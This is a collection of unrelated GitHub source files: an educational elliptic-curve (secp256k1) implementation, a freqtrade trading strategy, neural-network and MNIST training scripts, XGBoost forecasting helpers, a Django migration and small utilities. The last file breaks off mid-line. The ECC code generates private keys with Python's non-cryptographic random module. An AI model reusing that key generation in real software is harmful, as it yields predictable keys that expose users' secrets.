ECC:\nhttps://andrea.corbellini.name/2015/05/17/elliptic-curve-cryptography-a-gentle-introduction/\n\"\"\"\n\n\ndef bits(n):\n while n:\n yield n & 1\n n >>= 1\n\n\nclass Curve:\n def __init__(self, a, b, g, order, prime=None, name=\"Custom\"):\n self.a = a\n self.b = b\n self.g = g\n self.order = order\n self.prime = prime\n self.name = name\n\n def add_point(self, p, q):\n if p is None or q is None:\n return p or q\n\n assert self.is_on_curve(p)\n assert self.is_on_curve(q)\n\n px, py = p\n qx, qy = q\n\n if px == qx and py != qy:\n # p and q are inverse points\n return None\n\n m = self.slope(p, q)\n\n rx = m ** 2 - px - qx\n ry = -(py + m * (rx - px))\n\n if self.prime:\n rx = rx % self.prime\n ry = ry % self.prime\n\n assert self.is_on_curve((rx, ry))\n\n return rx, ry\n\n def scalar_multiply(self, n, p):\n assert self.is_on_curve(p)\n\n if n % self.order == 0 or p is None:\n return None\n\n result = None\n addend = p\n\n for bit in bits(n):\n if bit == 1:\n result = self.add_point(result, addend)\n addend = self.add_point(addend, addend)\n\n return result\n\n def slope(self, p, q):\n px, py = p\n\n if p == q:\n if self.prime:\n return (3 * (px ** 2) + self.a) * self.inverse_mod(2 * py)\n else:\n return (3 * (px ** 2) + self.a) / (2 * py)\n else:\n qx, qy = q\n\n if self.prime:\n m = (py - qy) * self.inverse_mod(px - qx)\n else:\n m = (py - qy) / (px - qx)\n\n return m\n\n def inverse_mod(self, k, p=None):\n # returns the inverse of k mod (prime || self.prime)\n prime = p\n if prime is None:\n prime = self.prime\n\n if prime is None:\n raise ValueError('Curve does not have prime modulus')\n\n if k == 0:\n raise ZeroDivisionError('division by zero')\n\n if k < 0:\n return prime - self.inverse_mod(-k, prime)\n\n # Extended Euclidean algorithm\n s, old_s = 0, 1\n t, old_t = 1, 0\n r, old_r = prime, k\n\n while r != 0:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n old_t, t = t, old_t - quotient * t\n\n gcd, x, y = old_r, old_s, old_t\n\n assert gcd == 1\n assert (k * x) % prime == 1\n\n return x % prime\n\n def is_on_curve(self, p):\n x, y = p\n\n if self.prime:\n return (y ** 2 - (x ** 3 + self.a * x + self.b)) % self.prime == 0\n else:\n return y ** 2 == x ** 3 + self.a * x + self.b\n\n def negate_point(self, p):\n assert self.is_on_curve(p)\n\n if p is None:\n return None\n\n x, y = p\n\n if self.prime:\n result = (x, -y % self.prime)\n else:\n result = (x, -y)\n\n assert self.is_on_curve(result)\n\n return result\n\n def make_keypair(self):\n private_key = random.randrange(1, self.order)\n public_key = self.scalar_multiply(private_key, self.g)\n\n return private_key, public_key\n\n\ndef secp256k1():\n a = 0\n b = 7\n order = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141\n prime = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_FFFFFC2F\n name = 'secp256k1'\n\n x = 0x79BE667E_F9DCBBAC_55A06295_CE870B07_029BFCDB_2DCE28D9_59F2815B_16F81798\n y = 0x483ADA77_26A3C465_5DA4FBFC_0E1108A8_FD17B448_A6855419_9C47D08F_FB10D4B8\n g = (x, y)\n\n return Curve(a, b, g, order, prime, name)","repo_name":"SamRond/encryption_methods","sub_path":"curves/ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27005409196","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport talib.abstract as ta\nimport numpy as np\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport datetime\nfrom technical.util import resample_to_interval, resampled_merge\nfrom datetime import datetime, timedelta\nfrom freqtrade.persistence import Trade\nfrom freqtrade.strategy import stoploss_from_open, merge_informative_pair, DecimalParameter, IntParameter, CategoricalParameter\n\nSMA = 'SMA'\nEMA = 'EMA'\n\n# Buy hyperspace params:\nbuy_params = {\n \"base_nb_candles_buy\": 30,\n \"buy_trigger\": SMA,\n \"low_offset\": 0.92,\n}\n\n# Sell hyperspace params:\nsell_params = {\n \"base_nb_candles_sell\": 41,\n \"high_offset\": 1.026,\n \"sell_trigger\": SMA,\n}\n\nclass SMAOffsetStrategy(IStrategy):\n INTERFACE_VERSION = 2\n\n # ROI table:\n minimal_roi = {\"0\": 1}\n\n # Stoploss:\n stoploss = -0.5\n\n base_nb_candles_buy = IntParameter(5, 80, default=buy_params['base_nb_candles_buy'], space='buy')\n base_nb_candles_sell = IntParameter(5, 80, default=sell_params['base_nb_candles_sell'], space='sell')\n low_offset = DecimalParameter(0.9, 0.99, default=buy_params['low_offset'], space='buy')\n high_offset = DecimalParameter(0.99, 1.1, default=sell_params['high_offset'], space='sell')\n buy_trigger = CategoricalParameter([SMA, EMA], default=buy_params['buy_trigger'], space='buy')\n sell_trigger = CategoricalParameter([SMA, EMA], default=sell_params['sell_trigger'], space='sell')\n\n # Trailing stop:\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0\n trailing_only_offset_is_reached = False\n\n # Optimal timeframe for the strategy\n timeframe = '5m'\n\n use_sell_signal = True\n sell_profit_only = False\n\n process_only_new_candles = True\n startup_candle_count = 30\n\n plot_config = {\n 'main_plot': {\n 'ma_offset_buy': {'color': 'orange'},\n 'ma_offset_sell': {'color': 'orange'},\n },\n }\n\n use_custom_stoploss = False\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n # uncomment for plotting\n\n #if self.buy_trigger.value == 'EMA':\n # dataframe['ma_buy'] = ta.EMA(dataframe, timeperiod=self.base_nb_candles_buy.value)\n #else:\n # dataframe['ma_buy'] = ta.SMA(dataframe, timeperiod=self.base_nb_candles_buy.value)\n\n #if self.sell_trigger.value == 'EMA':\n # dataframe['ma_sell'] = ta.EMA(dataframe, timeperiod=self.base_nb_candles_sell.value)\n #else:\n # dataframe['ma_sell'] = ta.SMA(dataframe, timeperiod=self.base_nb_candles_sell.value)\n\n #dataframe['ma_offset_buy'] = dataframe['ma_buy'] * self.low_offset.value\n #dataframe['ma_offset_sell'] = dataframe['ma_sell'] * self.high_offset.value\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n if self.buy_trigger.value == EMA:\n dataframe['ma_buy'] = ta.EMA(dataframe, timeperiod=int(self.base_nb_candles_buy.value))\n else:\n dataframe['ma_buy'] = ta.SMA(dataframe, timeperiod=int(self.base_nb_candles_buy.value))\n\n dataframe['ma_offset_buy'] = dataframe['ma_buy'] * self.low_offset.value\n\n dataframe.loc[\n (\n (dataframe['close'] < dataframe['ma_offset_buy']) &\n (dataframe['volume'] > 0)\n ),\n 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n if self.sell_trigger.value == EMA:\n dataframe['ma_sell'] = ta.EMA(dataframe, timeperiod=int(self.base_nb_candles_sell.value))\n else:\n dataframe['ma_sell'] = ta.SMA(dataframe, timeperiod=int(self.base_nb_candles_sell.value))\n\n dataframe['ma_offset_sell'] = dataframe['ma_sell'] * self.high_offset.value\n\n dataframe.loc[\n (\n (dataframe['close'] > dataframe['ma_offset_sell']) &\n (dataframe['volume'] > 0)\n ),\n 'sell'] = 1\n return dataframe\n","repo_name":"Regul777/trade-stuff-public","sub_path":"user_data/strategies/sma_offset_strategy.py","file_name":"sma_offset_strategy.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23983194197","text":"from __future__ import print_function\n\nfrom builtins import range\nfrom builtins import object\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom past.builtins import xrange\n\n\ndef loss(X, std, input_size, hidden_size, output_size, y=None, reg=0.0 ):\n \"\"\"\n Compute the loss and gradients for a two layer fully connected neural\n network.\n\n Inputs:\n - X: Input data of shape (N, D). Each X[i] is a training sample.\n - y: Vector of training labels. y[i] is the label for X[i], and each y[i] is\n an integer in the range 0 <= y[i] < C. This parameter is optional; if it\n is not passed then we only return scores, and if it is passed then we\n instead return the loss and gradients.\n - reg: Regularization strength.\n\n Returns:\n If y is None, return a matrix scores of shape (N, C) where scores[i, c] is\n the score for class c on input X[i].\n\n If y is not None, instead return a tuple of:\n - loss: Loss (data loss and regularization loss) for this batch of training\n samples.\n - grads: Dictionary mapping parameter names to gradients of those parameters\n with respect to the loss function; has the same keys as self.params.\n \"\"\"\n # Unpack variables from the params dictionary\n W1, b1 = std * np.random.randn(input_size,\n hidden_size), np.zeros(hidden_size)\n W2, b2 = std * np.random.randn(hidden_size,\n output_size), np.zeros(output_size)\n N, D = X.shape\n H, C = W2.shape\n\n # Compute the forward pass\n scores = None\n #############################################################################\n # TODO: Perform the forward pass, computing the class scores for the input. #\n # Store the result in the scores variable, which should be an array of #\n # shape (N, C). #\n #############################################################################\n # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n\n a1 = X.dot(W1) + b1 # (N, H)\n dW1 = (X.T).dot(np.ones_like(a1)) # (D,H)\n db1 = (np.ones((N,1)).T).dot(np.ones_like(a1)) #(1,H)\n\n cache = np.ones((N,H))\n cache[a1 < 0] = 0 #(N,H)\n a1[a1 < 0] = 0 #(N,H)\n da1_cache = cache * np.ones_like(a1) #(N,H)\n dW1 = X.T.dot(da1_cache) # (D,H)\n db1 = (np.ones((N,1)).T).dot(da1_cache) #(1,H)\n\n scores = a1.dot(W2) + b2 #(N,C)\n\n\n # *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n # If the targets are not given then jump out, we're done\n if y is None:\n return scores\n\n # Compute the loss\n loss = None\n #############################################################################\n # TODO: Finish the forward pass, and compute the loss. This should include #\n # both the data loss and L2 regularization for W1 and W2. Store the result #\n # in the variable loss, which should be a scalar. Use the Softmax #\n # classifier loss. #\n #############################################################################\n # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n dW2 = a1.T.dot(np.ones_like(scores)) #(H,C)\n db2 = (np.ones((N,1)).T).dot(np.ones_like(scores)) #(1,C)\n #da1 = (W2.dot(np.ones((C,N)))).T #(N,H)\n da1 = np.ones_like(scores).dot(W2.T) #(N,H)\n dW1 = X.T.dot(da1 * da1_cache) #(D,H)\n db1 = (np.ones((N,1)).T).dot(da1 * da1_cache) #(1,H)\n\n scores_max = np.max(scores, axis=1) #(N,)\n scores_max_arg = np.argmax(scores, axis=1) #(N,)\n \n scores -= scores_max.reshape(-1,1) # (N,C)\n dscores_max_pre = np.zeros_like(scores) #(N,C)\n dscores_max_pre[range(N),scores_max_arg] = 1 #(N,C)\n\n dW2 = a1.T.dot(np.ones_like(scores)) - a1.T.dot(dscores_max_pre) # (H,C)\n db2 = (np.ones((N, 1)).T).dot(np.ones_like(scores)\n ) - (np.ones((N, 1)).T).dot(dscores_max_pre) # (1,C)\n da1 = np.ones_like(scores).dot(W2.T) - (np.ones_like(scores).dot(np.ones((C,1)))) * dscores_max_pre.dot(W2.T) # (N,H)\n dW1 = X.T.dot(da1 * da1_cache) # (D,H)\n db1 = (np.ones((N,1)).T).dot(da1 * da1_cache) #(1,H)\n\n scores = np.exp(scores) # (N,C)\n dW2 = a1.T.dot(scores * np.ones_like(scores)) - \\\n a1.T.dot(scores * dscores_max_pre) # (H,C)\n db2 = (np.ones((N, 1)).T).dot(scores * np.ones_like(scores)\n ) - (np.ones((N, 1)).T).dot(scores * dscores_max_pre) # (1,C)\n da1 = (scores * np.ones_like(scores)).dot(W2.T) - \\\n (scores * np.ones_like(scores)).dot(np.ones((C, 1))) * \\\n dscores_max_pre.dot(W2.T) # (N,H)\n dW1 = X.T.dot(da1 * da1_cache) # (D,H)\n db1 = (np.ones((N, 1)).T).dot(da1 * da1_cache) # (1,H)\n\n\n scores_correct = np.zeros_like(scores)\n scores_correct[range(N),y] = 1\n scores_correct = scores_correct * scores\n\n loss = -np.log(np.sum(scores_correct, axis=1) /\n np.sum(scores, axis=1)) # (N,)\n \n scores_sum = np.sum(scores, axis=1).reshape(N,1)\n scores_correct_exp = (np.sum(scores_correct, axis=1)).reshape(N, 1)\n '''\n scores[range(N), y] = -(scores_sum - scores_correct_exp).flatten()\n scores[range(N), scores_max_arg] = 1\n dW2 = a1.T.dot((-scores_correct_exp / scores_sum**2) *\n scores / -(scores_correct_exp / scores_sum))\n '''\n dW21 = a1.T.dot(scores_correct * (scores - scores * dscores_max_pre) + scores * scores_correct) # (H,C)\n \n \n scores[range(N), y] = -(scores_sum - scores_correct_exp).flatten()\n scores[range(N), scores_max_arg] = 1\n dW22 = a1.T.dot((-scores_correct_exp / scores_sum**2) *\n scores / -(scores_correct_exp / scores_sum))\n \n\n # *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n return dW22-dW21\n\nstd = 1e-4\ninput_size, hidden_size, output_size = 3,5,4\nX = np.random.randn(5, 3)\ny = np.array([1,3,2]).reshape(3,1)\nb = loss(X, std, input_size, hidden_size, output_size, y)\nc = np.sum(b)\nprint(b)\n","repo_name":"bearwangcai/CS","sub_path":"assignment1/cs231n/classifiers/test_ver.py","file_name":"test_ver.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72415520831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom campaigns.models import Campaign\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('campaigns', '0002_auto_20150517_0117'),\n ('characters', '0006_auto_20150524_0031'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='character',\n name='campaign',\n field=models.ForeignKey(default=Campaign.objects.get(pk=2).id, to='campaigns.Campaign'),\n preserve_default=False,\n ),\n ]\n","repo_name":"DavyK/opentable","sub_path":"characters/migrations/0007_character_campaign.py","file_name":"0007_character_campaign.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7245293371","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nfrom model import MNISTClassifier\nfrom utils import *\n\n# use GPU if available, otherwise use the CPU\nprint(\"GPU available: {}\".format(torch.cuda.is_available()))\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# set up model\nmodel = MNISTClassifier(pretrained = True).to(device)\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)), # normalize images\n])\n\n# set up train and test datasets\nmnist_train = datasets.MNIST(\"data\", train = True, transform = transform, target_transform = None, download = True)\nmnist_test = datasets.MNIST(\"data\", train = False, transform = transform, target_transform = None, download = True)\n\nprint(\"Train size: {}\".format(len(mnist_train)))\nprint(\"Test size: {}\".format(len(mnist_test)))\n\n# set up train and test dataset loaders\ntrain_loader = torch.utils.data.DataLoader(mnist_train, batch_size = args.batch_size, shuffle = True)\ntest_loader = torch.utils.data.DataLoader(mnist_test, batch_size = 16, shuffle = True)\n\n# set up optimizer and loss function\nif args.optim == 'adam':\n optimizer = optim.Adam(model.parameters(), lr = args.learning_rate, betas = (0.9, 0.999))\nelse:\n optimizer = optim.SGD(model.parameters(), lr = args.learning_rate, momentum = 0.9)\nloss_func = nn.CrossEntropyLoss(reduction = 'sum').to(device)\n\nprint(\"\\nTraining on MNIST:\")\nprint(\"\\tNum epochs: {}\".format(args.num_epochs))\nprint(\"\\tLearning rate: {}\".format(args.learning_rate))\nprint(\"\\tBatch size: {}\".format(args.batch_size))\n\n# train the model\nfor epoch in range(args.num_epochs):\n for batch_id, sample in enumerate(train_loader):\n # get the data (images and labels)\n imgs, labels = sample\n imgs = imgs.to(device)\n true_labels = labels.to(device)\n\n # make predictions and calculate loss\n pred_scores = model(imgs).to(device)\n loss = loss_func(pred_scores, true_labels)\n\n # weight update\n model.zero_grad()\n loss.backward()\n optimizer.step()\n\n # log info for the user\n if batch_id % 10 == 0:\n print(\"(train) => Epoch {}/{} - Batch {}/{} - Loss: {}\".format(epoch+1, args.num_epochs, batch_id, len(train_loader), loss.item()))\n\n# test the model\ncorrect = 0\nfor batch_id, sample in enumerate(test_loader):\n # get the data (images and labels)\n imgs, labels = sample\n imgs = imgs.to(device)\n true_labels = labels.to(device)\n\n # make predictions for each class\n pred_scores = model(imgs).to(device)\n\n # take the highest class prediction and count how many labels matched the ground-truth labels\n pred_label = torch.argmax(pred_scores, 1) # i.e. if predictions were [0.1, 0.0, 0.6, ..., 0.0], it'd return index/class 2\n correct += torch.sum(pred_label == true_labels).item() # count how many were correct\n\n # log info for the user\n if batch_id % 100 == 0:\n print(\"(test) => Batch {}/{}\".format(batch_id, len(test_loader)))\ntest_accuracy = correct / len(mnist_test)\nprint(\"Test accuracy: {}%\".format(round(test_accuracy * 100.0, 2)))\n\n# save the model\nmodel_path = os.path.join(\"models\", \"mnist_model\")\nif not os.path.isdir(\"models\"):\n os.mkdir(\"models\")\nif os.path.exists(model_path): # remove previously saved model\n os.remove(model_path)\ntorch.save(model.state_dict(), model_path)\n","repo_name":"kingsman142/mnist-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"17604077179","text":"import CTK\n\nUSUAL_STATIC_FILES = ['/favicon.ico', '/robots.txt', '/crossdomain.xml',\n '/sitemap.xml', '/sitemap.xml.gz']\n\n\ndef Add_Usual_Static_Files (rule_pre, files = USUAL_STATIC_FILES):\n CTK.cfg['%s!match'%(rule_pre)] = 'fullpath'\n CTK.cfg['%s!handler'%(rule_pre)] = 'file'\n CTK.cfg['%s!handler!iocache'%(rule_pre)] = '1'\n CTK.cfg['%s!encoder!gzip'%(rule_pre)] = '0'\n CTK.cfg['%s!encoder!deflate'%(rule_pre)] = '0'\n CTK.cfg['%s!expiration'%(rule_pre)] = 'time'\n CTK.cfg['%s!expiration!time'%(rule_pre)] = '1h'\n\n n = 1\n for file in files:\n CTK.cfg['%s!match!fullpath!%d'%(rule_pre,n)] = file\n n += 1\n\n","repo_name":"cherokee/wizards2","sub_path":"vserver.py","file_name":"vserver.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"27731690292","text":"import numpy as np\nfrom xgboost import XGBRegressor\nimport math\n\n\ndef get_mape(y_true, y_pred):\n \"\"\"\n Compute mean absolute percentage error (MAPE)\n \"\"\"\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef get_mae(a, b):\n \"\"\"\n Comp mean absolute error e_t = E[|a_t - b_t|]. a and b can be lists.\n Returns a vector of len = len(a) = len(b)\n \"\"\"\n return np.mean(abs(np.array(a)-np.array(b)))\n\n\ndef get_rmse(a, b):\n \"\"\"\n Comp RMSE. a and b can be lists.\n Returns a scalar.\n \"\"\"\n return math.sqrt(np.mean((np.array(a)-np.array(b))**2))\n\n\ndef pred_xgboost(model, X_test_ex_adj_close, N, H, prev_vals, prev_mean_val, prev_std_val):\n \"\"\"\n Do recursive forecasting using xgboost\n Inputs\n model : the xgboost model\n X_test_ex_adj_close: features of the test set, excluding adj_close_scaled values\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n prev_vals : numpy array. If predict at time t,\n prev_vals will contain the N unscaled values at t-1, t-2, ..., t-N\n prev_mean_val : the mean of the unscaled values at t-1, t-2, ..., t-N\n prev_std_val : the std deviation of the unscaled values at t-1, t-2, ..., t-N\n Outputs\n Times series of predictions. Numpy array of shape (H,). This is unscaled.\n \"\"\"\n forecast = prev_vals.copy()\n\n for n in range(H):\n forecast_scaled = (forecast[-N:] - prev_mean_val) / prev_std_val\n\n # Create the features dataframe\n X = X_test_ex_adj_close[n:n + 1].copy()\n for n in range(N, 0, -1):\n X.loc[:, \"adj_close_scaled_lag_\" + str(n)] = forecast_scaled[-n]\n\n # Do prediction\n est_scaled = model.predict(X)\n\n # Unscale the prediction\n forecast = np.concatenate([forecast,\n np.array((est_scaled * prev_std_val) + prev_mean_val).reshape(1, )])\n\n # Comp. new mean and std\n prev_mean_val = np.mean(forecast[-N:])\n prev_std_val = np.std(forecast[-N:])\n\n return forecast[-H:]\n\n\ndef train_pred_eval_model(X_train_scaled,\n y_train_scaled,\n X_test_ex_adj_close,\n y_test,\n N,\n H,\n prev_vals,\n prev_mean_val,\n prev_std_val,\n seed=100,\n n_estimators=100,\n max_depth=3,\n learning_rate=0.1,\n min_child_weight=1,\n subsample=1,\n colsample_bytree=1,\n colsample_bylevel=1,\n gamma=0):\n '''\n Train model, do prediction, scale back to original range and do evaluation\n Use XGBoost here.\n Inputs\n X_train_scaled : features for training. Scaled to have mean 0 and variance 1\n y_train_scaled : target for training. Scaled to have mean 0 and variance 1\n X_test_ex_adj_close: features of the test set, excluding adj_close_scaled values\n y_test : target for test. Actual values, not scaled.\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n prev_vals : numpy array. If predict at time t,\n prev_vals will contain the N unscaled values at t-1, t-2, ..., t-N\n prev_mean_val : the mean of the unscaled values at t-1, t-2, ..., t-N\n prev_std_val : the std deviation of the unscaled values at t-1, t-2, ..., t-N\n seed : model seed\n n_estimators : number of boosted trees to fit\n max_depth : maximum tree depth for base learners\n learning_rate : boosting learning rate (xgb’s “eta”)\n min_child_weight : minimum sum of instance weight(hessian) needed in a child\n subsample : subsample ratio of the training instance\n colsample_bytree : subsample ratio of columns when constructing each tree\n colsample_bylevel : subsample ratio of columns for each split, in each level\n gamma :\n Outputs\n rmse : root mean square error of y_test and est\n mape : mean absolute percentage error of y_test and est\n mae : mean absolute error of y_test and est\n est : predicted values. Same length as y_test\n '''\n model_seed = 100\n model = XGBRegressor(objective='reg:squarederror',\n seed=model_seed,\n n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n\n # Train the model\n model.fit(X_train_scaled, y_train_scaled)\n\n # Get predicted labels and scale back to original range\n est = pred_xgboost(model, X_test_ex_adj_close, N, H, prev_vals, prev_mean_val, prev_std_val)\n\n # Calculate RMSE, MAPE, MAE\n rmse = get_rmse(y_test, est)\n mape = get_mape(y_test, est)\n mae = get_mae(y_test, est)\n\n return rmse, mape, mae, est, model.feature_importances_\n\n\ndef do_scaling(df, N):\n \"\"\"\n Do scaling for the adj_close and lag cols\n \"\"\"\n df[df.columns[0]] = (df['adj_close'] - df['adj_close_mean']) / df['adj_close_std']\n for n in range(N, 0, -1):\n df.loc[:, 'adj_close_scaled_lag_' + str(n)] = \\\n (df['adj_close_lag_' + str(n)] - df['adj_close_mean']) / df['adj_close_std']\n\n # Remove adj_close_lag column which we don't need anymore\n df.drop(['adj_close_lag_' + str(n)], axis=1, inplace=True)\n\n return df\n\n\ndef get_error_metrics(df, train_size, N, H, seed=100, n_estimators=100, max_depth=3, learning_rate=0.1,\n min_child_weight=1, subsample=1, colsample_bytree=1, colsample_bylevel=1, gamma=0):\n \"\"\"\n Given a series consisting of both train+validation, do predictions of forecast horizon H on the validation set,\n at H/2 intervals.\n Inputs\n df : train + val dataframe. len(df) = train_size + val_size\n train_size : size of train set\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n seed : model seed\n n_estimators : number of boosted trees to fit\n max_depth : maximum tree depth for base learners\n learning_rate : boosting learning rate (xgb’s “eta”)\n min_child_weight : minimum sum of instance weight(hessian) needed in a child\n subsample : subsample ratio of the training instance\n colsample_bytree : subsample ratio of columns when constructing each tree\n colsample_bylevel : subsample ratio of columns for each split, in each level\n gamma :\n Outputs\n mean of rmse, mean of mape, mean of mae, dictionary of predictions\n \"\"\"\n rmse_list = [] # root mean square error\n mape_list = [] # mean absolute percentage error\n mae_list = [] # mean absolute error\n preds_dict = {}\n\n # Do scaling\n # df = do_scaling(df, N)\n\n # Get list of features\n features = list(set(df.columns) - {df.columns[0]})\n\n for i in range(train_size, len(df) - H + 1, int(H / 2)):\n # Split into train and test\n train = df[i - train_size:i].copy()\n test = df[i:i + H].copy()\n\n # Drop the NaNs in train\n train.dropna(axis=0, how='any', inplace=True)\n\n # Split into X and y\n X_train_scaled = train[features]\n y_train_scaled = train[df.columns[0]]\n X_test_ex_adj_close = test[features]\n y_test = test['adj_close']\n prev_vals = train[-N:]['adj_close'].to_numpy()\n prev_mean_val = test.iloc[0]['adj_close_mean']\n prev_std_val = test.iloc[0]['adj_close_std']\n\n rmse, mape, mae, est, _ = train_pred_eval_model(X_train_scaled,\n y_train_scaled,\n X_test_ex_adj_close,\n y_test,\n N,\n H,\n prev_vals,\n prev_mean_val,\n prev_std_val,\n seed=seed,\n n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n # print(\"N = \" + str(N) + \", i = \" + str(i) + \", rmse = \" + str(rmse) + \", mape = \" + str(mape) + \", mae = \" + str(mae))\n\n rmse_list.append(rmse)\n mape_list.append(mape)\n mae_list.append(mae)\n preds_dict[i] = est\n\n return np.mean(rmse_list), np.mean(mape_list), np.mean(mae_list), preds_dict\n\n\n\ndef xgboost_aux():\n import time\n from _collections import defaultdict\n\n param_label = 'n_estimators'\n param_list = range(1, 61, 2)\n\n param2_label = 'max_depth'\n param2_list = [2, 3, 4, 5, 6, 7, 8, 9]\n\n error_rate = defaultdict(list)\n\n tic = time.time()\n for param in tqdm_notebook(param_list):\n for param2 in param2_list:\n rmse_mean, mape_mean, mae_mean, _ = get_error_metrics(train_val,\n train_size,\n N_opt,\n H,\n seed=model_seed,\n n_estimators=param,\n max_depth=param2,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n\n # Collect results\n error_rate[param_label].append(param)\n error_rate[param2_label].append(param2)\n error_rate['rmse'].append(rmse_mean)\n error_rate['mape'].append(mape_mean)\n error_rate['mae'].append(mae_mean)\n\n error_rate = pd.DataFrame(error_rate)\n toc = time.time()\n print(\"Minutes taken = {0:.2f}\".format((toc - tic) / 60.0))\n\n error_rate","repo_name":"heliodomingos/autoSeries","sub_path":"train_module/xg_aux.py","file_name":"xg_aux.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"30897502872","text":"import pygame\n\n# Initialize Pygame\npygame.init()\n\n# Set the screen size and caption\nsize = (700, 500)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Mouse Game\")\n\n# Set the background color\nbg_color = (255, 255, 255)\n\n# Create a variable to control the game loop\nrunning = True\n\n# Start the game loop\nwhile running:\n # Handle events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Get the mouse position\n mouse_pos = pygame.mouse.get_pos()\n\n # Clear the screen\n screen.fill(bg_color)\n\n # Draw a circle at the mouse position\n pygame.draw.circle(screen, (255, 0, 0), mouse_pos, 50)\n\n # Update the screen\n pygame.display.flip()\n\n# Exit Pygame\npygame.quit()","repo_name":"Shreyaanp/Wireless-Wizard","sub_path":"interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21549352066","text":"import tensorflow as _tf\nimport dataset.csv as csv\nimport os as _os\nfrom utils import logutil as _logutil\nfrom . import augmentation as _augmentation\n\n_tde = _tf.data.experimental\n_logging = _logutil.get_logger()\n_FLAGS = _tf.app.flags.FLAGS\n\n\ndef load(machine=None):\n csv.inspect()\n if machine is not None:\n machine.dataset_loader = Loader()\n else:\n return Loader()\n\n\nclass Loader():\n def __init__(self):\n self._streams = {}\n self._generate_stream()\n pass\n\n def _generate_stream(self):\n for key in [key for key in _FLAGS if str(key).endswith('csv')]:\n csv_file = _FLAGS[key]._value\n csv_path = _os.path.join(_FLAGS.dataset_dir, _FLAGS.type,\n csv_file)\n key = str(key).split('_')[0]\n\n for suffix, phase in [(\"train\", _FLAGS.phase_train), (\"eval\", _FLAGS.phase_eval),\n (\"sampling\", _FLAGS.phase_sampling)]:\n data_pool = _tf.data.TextLineDataset([csv_path])\n augs = []\n if key.find('train') >= 0:\n batch_size = _FLAGS.trainset_batch_size\n for _key in [_key for _key in _FLAGS]:\n if str(_key).startswith('augment'):\n aug_flag = _FLAGS[_key]._value\n if aug_flag:\n augs.append(str(_key).split('_')[1])\n elif key.find('valid') >= 0:\n batch_size =3\n elif key.find('test') >= 0:\n batch_size = 3\n elif key.find('ipiu') >= 0:\n batch_size = 3\n else:\n raise AttributeError(\"Invalid batch_size\")\n\n data_pool = data_pool.apply(_tde.shuffle_and_repeat(_FLAGS.buffer_size))\n # data_pool = data_pool.apply(_tde.shuffle_and_repeat(1))\n data_pool = data_pool.apply(_tde.map_and_batch(\n map_func=lambda row: 